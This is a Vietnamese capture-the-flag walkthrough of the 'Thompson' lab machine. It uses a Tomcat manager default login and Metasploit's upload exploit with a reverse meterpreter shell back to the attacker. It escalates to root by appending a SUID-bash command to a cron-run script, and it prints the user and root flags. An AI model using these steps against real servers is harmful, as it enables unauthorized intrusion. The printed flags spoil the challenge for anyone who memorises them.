Thompson
boot2root machine for FIT and bsides guatemala CTF.
November 4, 2025
•
August 19, 2025
•
Easy
Author
Hung Nguyen Tuong
Hung Nguyen TuongInitial Reconnaissance
Service Scanning
┌──(kali㉿kali)-[~/Documents]
└─$ sudo nmap -sV -sC -v thompson.thm
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 fc:05:24:81:98:7e:b8:db:05:92:a6:e7:8e:b0:21:11 (RSA)
| 256 60:c8:40:ab:b0:09:84:3d:46:64:61:13:fa:bc:1f:be (ECDSA)
|_ 256 b5:52:7e:9c:01:9b:98:0c:73:59:20:35:ee:23:f1:a5 (ED25519)
8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
|_ajp-methods: Failed to get a valid response for the OPTION request
8080/tcp open http Apache Tomcat 8.5.5
|_http-title: Apache Tomcat/8.5.5
| http-methods:
|_ Supported Methods: GET HEAD POST
|_http-favicon: Apache Tomcat
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelKết quả scan từ Nmap cho chúng ta thấy dịch vụ SSH tại port 22, với tên phiên bản gợi hệ điều hành là Ubuntu. Port 8009 chạy dịch vụ AJP13 (Apache JServ Protocol v1.3). Đây là một giao thức thường dùng để kết nối giữa Apache HTTP Server và Apache Tomcat. Cuối cùng là port 8080 chạy Apache Tomcat 8.5.5.
SSH 22
Dịch vụ SSH trên hệ thống này cho phép đăng nhập bằng password.
HTTP 8080
Vì web server đang chạy Apache Tomcat 8.5.5, chúng ta sẽ dùng một scanner để kiểm tra.
┌──(env)(kali㉿kali)-[~/Tools/ApacheTomcatScanner]
└─$ py ApacheTomcatScanner.py -tu http://thompson.thm:8080 -v -C
Apache Tomcat Scanner v3.7 - by Remi GASCOU (Podalirius)
[verbose] 10 credentials will be tested per target
[+] Targeting 1 urls.
[+] Searching for Apache Tomcats servers on specified targets ...
[2025/08/19 17h51m54s] Status (0/1) 0.00 % | Rate 0 tests/s [>] [Apache Tomcat/8.5.5] on thompson.thm:8080 (manager: accessible) on http://thompson.thm:8080/manager/html
| Valid user: tomcat | password: s3cret | Default account in configuration, with roles="tomcat"
| CVEs: CVE-2017-5651, CVE-2016-8735, CVE-2017-12617, CVE-2016-6816, CVE-2017-5648, CVE-2017-5650, CVE-2017-5664, CVE-2017-7675, CVE-2017-5647, CVE-2016-6817, CVE-2016-8745, CVE-2017-7674, CVE-2020-13943, CVE-2022-25762, CVE-2022-42252
[+] All done!Kết quả cho thấy có một credentials mặc định hợp lệ: tomcat:s3cret.
Meterpreter Shell as tomcat
Dùng searchsploit, chúng ta phát hiện Apache Tomcat Manager tồn tại lỗ hổng authenticated Remote Code Execution (RCE). Rất hợp lý vì chúng ta đã có credentials mặc định ở trên.
┌──(kali㉿kali)-[~]
└─$ searchsploit apache tomcat authen
---------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
---------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Apache Tomcat - Form Authentication 'Username' Enumeration | multiple/remote/9995.txt
Apache Tomcat 6.0.18 - Form Authentication Existing/Non-Existing 'Username' Enumeration | multiple/remote/33023.txt
Apache Tomcat Manager - Application Deployer (Authenticated) Code Execution (Metasploit) | multiple/remote/16317.rb
Apache Tomcat Manager - Application Upload (Authenticated) Code Execution (Metasploit) | multiple/remote/31433.rb
---------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------Tiếp theo, chúng ta sử dụng metasploit vì exploit này đã được viết thành module sẵn trong đó.
msf6 auxiliary(scanner/http/tomcat_mgr_login) > search exploit apache tomcat manager upload
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/multi/http/tomcat_mgr_deploy 2009-11-09 excellent Yes Apache Tomcat Manager Application Deployer Authenticated Code Execution
1 \_ target: Automatic . . . .
2 \_ target: Java Universal . . . .
3 \_ target: Windows Universal . . . .
4 \_ target: Linux x86 . . . .
5 exploit/multi/http/tomcat_mgr_upload 2009-11-09 excellent Yes Apache Tomcat Manager Authenticated Upload Code Execution
6 \_ target: Java Universal . . . .
7 \_ target: Windows Universal . . . .
8 \_ target: Linux x86 . . . .
Interact with a module by name or index. For example info 8, use 8 or use exploit/multi/http/tomcat_mgr_upload
After interacting with a module you can manually set a TARGET with set TARGET 'Linux x86'
msf6 auxiliary(scanner/http/tomcat_mgr_login) > use 5
[*] No payload configured, defaulting to java/meterpreter/reverse_tcpSau khi cấu hình đầy đủ các tham số cần thiết và chạy exploit, chúng ta thành công có được quyền truy cập vào target dưới user tomcat.
msf6 exploit(multi/http/tomcat_mgr_upload) > options
Module options (exploit/multi/http/tomcat_mgr_upload):
Name Current Setting Required Description
---- --------------- -------- -----------
HttpPassword no The password for the specified username
HttpUsername no The username to authenticate as
Proxies no A proxy chain of format type:host:port[,type:host:port][...]. Supported proxies: sapni, socks4, socks5, socks5h
, http
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI /manager yes The URI path of the manager app (/html/upload and /undeploy will be used)
VHOST no HTTP server virtual host
Payload options (java/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.2.23 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Java Universal
View the full module info with the info, or info -d command.
msf6 exploit(multi/http/tomcat_mgr_upload) > set httpusername tomcat
httpusername => tomcat
msf6 exploit(multi/http/tomcat_mgr_upload) > set httppassword s3cret
httppassword => s3cret
msf6 exploit(multi/http/tomcat_mgr_upload) > set rhosts thompson.thm
rhosts => thompson.thm
msf6 exploit(multi/http/tomcat_mgr_upload) > set rport 8080
rport => 8080
msf6 exploit(multi/http/tomcat_mgr_upload) > set lhost tun0
lhost => 10.17.21.52
msf6 exploit(multi/http/tomcat_mgr_upload) > run
[*] Started reverse TCP handler on 10.17.21.52:4444
[*] Retrieving session ID and CSRF token...
[*] Uploading and deploying q2ppksw...
[*] Executing q2ppksw...
[*] Sending stage (58073 bytes) to 10.201.29.231
[*] Undeploying q2ppksw ...
[*] Undeployed at /manager/html/undeploy
[*] Meterpreter session 1 opened (10.17.21.52:4444 -> 10.201.29.231:38520) at 2025-08-19 18:25:15 +0700
meterpreter > getuid
Server username: tomcatuser.txt
tomcat@ubuntu:/$ cd home
cd home
tomcat@ubuntu:/home$ ls -la
ls -la
total 12
drwxr-xr-x 3 root root 4096 Aug 14 2019 .
drwxr-xr-x 22 root root 4096 Aug 14 2019 ..
drwxr-xr-x 4 jack jack 4096 Aug 23 2019 jack
tomcat@ubuntu:/home$ cd jack
cd jack
tomcat@ubuntu:/home/jack$ ls -la
ls -la
total 48
drwxr-xr-x 4 jack jack 4096 Aug 23 2019 .
drwxr-xr-x 3 root root 4096 Aug 14 2019 ..
-rw------- 1 root root 1476 Aug 14 2019 .bash_history
-rw-r--r-- 1 jack jack 220 Aug 14 2019 .bash_logout
-rw-r--r-- 1 jack jack 3771 Aug 14 2019 .bashrc
drwx------ 2 jack jack 4096 Aug 14 2019 .cache
-rwxrwxrwx 1 jack jack 26 Aug 14 2019 id.sh
drwxrwxr-x 2 jack jack 4096 Aug 14 2019 .nano
-rw-r--r-- 1 jack jack 655 Aug 14 2019 .profile
-rw-r--r-- 1 jack jack 0 Aug 14 2019 .sudo_as_admin_successful
-rw-r--r-- 1 root root 39 Aug 19 04:26 test.txt
-rw-rw-r-- 1 jack jack 33 Aug 14 2019 user.txt
-rw-r--r-- 1 root root 183 Aug 14 2019 .wget-hsts
tomcat@ubuntu:/home/jack$ cat user.txt
cat user.txt
39400c90bc683a41a8935e4719f181bfTrong home folder của user jack, chúng ta tìm thấy không chỉ file user.txt mà còn có một bash script id.sh và một file text test.txt.
tomcat@ubuntu:/home/jack$ cat test.txt
cat test.txt
uid=0(root) gid=0(root) groups=0(root)
tomcat@ubuntu:/home/jack$ cat id.sh
cat id.sh
#!/bin/bash
id > test.txtNội dung của test.txt chứa output của lệnh id khi chạy dưới quyền root. Còn script id.sh thực chất đang redirect lệnh id vào test.txt, điều này chứng tỏ script được chạy dưới quyền root.
Chúng ta có thể đoán ngay đây là một cronjob.
tomcat@ubuntu:/home/jack$ cat /etc/crontab
cat /etc/crontab
## /etc/crontab: system-wide crontab
## Unlike any other crontab you don't have to run the `crontab'
## command to install the new version when you edit this file
## and files in /etc/cron.d. These files also have username fields,
## that none of the other crontabs do.
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
## m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
* * * * * root cd /home/jack && bash id.sh
#Vì chúng ta có quyền ghi vào file id.sh, chúng ta có thể chèn bất kỳ command nào và nó sẽ được thực thi với quyền root.
Shell as root
Chúng ta sẽ copy binary /bin/bash và đặt cho nó SUID permission bit để bất kỳ user nào cũng có thể chạy nó với quyền root:
tomcat@ubuntu:/home/jack$ echo "cp /bin/bash /tmp/shell; chmod u+s /tmp/shell" >> id.sh
<cho "cp /bin/bash /tmp/shell; chmod u+s /tmp/shell" >> id.sh
tomcat@ubuntu:/home/jack$ cat id.sh
cat id.sh
#!/bin/bash
id > test.txt
cp /bin/bash /tmp/shell; chmod u+s /tmp/shell
tomcat@ubuntu:/home/jack$ cd /tmp
cd /tmp
tomcat@ubuntu:/tmp$ ls -la
ls -la
total 1056
drwxrwxrwt 10 root root 4096 Aug 19 04:30 .
drwxr-xr-x 22 root root 4096 Aug 14 2019 ..
drwxrwxrwt 2 root root 4096 Aug 19 03:07 .font-unix
drwxr-x--- 2 tomcat tomcat 4096 Aug 19 04:25 hsperfdata_tomcat
drwxrwxrwt 2 root root 4096 Aug 19 03:07 .ICE-unix
-rwsr-xr-x 1 root root 1037528 Aug 19 04:30 shell
drwx------ 3 root root 4096 Aug 19 03:07 systemd-private-790db77e1b13456eb630b88cb7833710-systemd-timesyncd.service-EzOcPX
drwxrwxrwt 2 root root 4096 Aug 19 03:07 .Test-unix
drwxrwxrwt 2 root root 4096 Aug 19 03:07 VMwareDnD
drwxrwxrwt 2 root root 4096 Aug 19 03:07 .X11-unix
drwxrwxrwt 2 root root 4096 Aug 19 03:07 .XIM-unix
tomcat@ubuntu:/tmp$ ./shell -p
./shell -p
shell-4.3# id
id
uid=1001(tomcat) gid=1001(tomcat) euid=0(root) groups=1001(tomcat)root.txt
shell-4.3# cd /root
cd /root
shell-4.3# ls -la
ls -la
total 24
drwx------ 3 root root 4096 Aug 14 2019 .
drwxr-xr-x 22 root root 4096 Aug 14 2019 ..
-rw-r--r-- 1 root root 3106 Oct 22 2015 .bashrc
drwxr-xr-x 2 root root 4096 Aug 14 2019 .nano
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
-rw-r--r-- 1 root root 33 Aug 14 2019 root.txt
shell-4.3# cat root.txt
cat root.txt
d89d5391984c0450a95497153ae7ca3a